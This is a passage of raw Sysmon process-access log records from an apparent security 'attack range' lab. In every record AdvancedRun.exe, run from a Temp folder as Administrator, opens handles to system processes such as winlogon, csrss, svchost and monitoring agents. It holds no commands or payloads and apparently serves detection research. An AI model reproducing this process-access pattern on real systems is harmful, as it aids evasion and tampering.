YSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.919{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004078628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
